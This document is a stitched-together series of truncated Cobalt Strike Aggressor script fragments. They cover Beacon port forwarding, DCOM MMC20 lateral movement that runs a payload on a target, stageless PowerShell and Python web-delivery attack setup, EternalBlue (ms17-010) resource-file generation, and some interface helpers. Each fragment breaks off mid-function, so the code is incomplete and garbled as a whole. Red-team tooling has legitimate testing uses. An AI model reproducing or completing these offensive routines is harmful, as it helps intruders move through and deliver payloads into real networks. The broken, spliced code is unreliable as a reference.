#
# port forward alias in Beacon and SSH
#
# pull common code into a function
sub _portfwd {
    if ($2 eq "stop") {
        btask($1, "Tasked session to stop forward to $3");
        call("beacons.pivot_stop_port", $null, $3);
    }

# Lateral Movement alias
# https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
# register help for our alias
beacon_command_register("com-exec", "lateral movement with DCOM",
    "Synopsis: com-exec [target] [listener]\n\n" .
    "Run a payload on a target via DCOM MMC20.Application Object");
# here's our alias to collect our arguments
alias com-exec {

# Scripted Web Delivery (Stageless)
#
# This script demonstrates some of the new APIs in Cobalt Strike 3.7.
# setup our stageless PowerShell Web Delivery attack
sub setup_attack {
    local('%options $script $url $arch');
    %options = $3;
    # get the arch right.

#
# This script overrides WEB_HIT and PROFILER_HIT from default.cna to
# resolve the id var (token) to an email
#
# https://www.cobaltstrike.com/aggressor-script/cobaltstrike.html
#
# method, uri, addr, ua, response, size, handler, when
set WEB_HIT {
    local('$out $now $method $uri $addr $ua $response $size $handler $when $params');

# Python Stageless Scripted Web Delivery
# setup our stageless Python Web Delivery attack
sub setup_attack {
    local('%options $x86payload $x64payload $url $script');
    %options = $3;
    # generate our stageless x86 payload
    artifact_stageless(%options["listener"], "raw", "x86", $null, $this);
    yield;

#
# script to help move around with ms17-010 from Metasploit
# Go to Attacks -> Eternal Blue
#
# target, listener, where to save .rc file
sub generate_rc_file {
    local('$target $listener $where $handle $shellcode');
    ($target, $listener, $where) = @_;

#
# safe delete in file browser right-click menu
#
popup_clear("filebrowser");
popup filebrowser {
    item "&Download" {
        local('$file');
        foreach $file ($3) {
            bdownload($1, "$2 $+ \\ $+ $file");

# demonstrate how to add a popup handler to a Swing component in Sleep
import java.awt.*;
import javax.swing.*;
import javax.swing.event.*;
# safely add a listener to show a popup
sub setupPopupMenu {
    # we're using fork({}) to run this in a separate Aggressor Script environment.

#
# Demonstrate how to queue tasks to execute with each checkin...
#
#
# yield tells a function to pause and return a value. The next time the same instance of the
# function is called, it will resume after where it last yielded.
#
sub stuffToDo {
    # Tasks for first checkin

import aggressor.windows.BeaconConsole;
import java.awt.event.ActionEvent;
# $1 = beacon ID
# $2 = command + args to run [as if you typed it in the console]
sub beacon_input_command {
    local('$event');
    # we make the console a static var because each console we create subscribes to a bunch of stuff
    # and requires a manual step [normally performed by a Window close event] to clean up these things.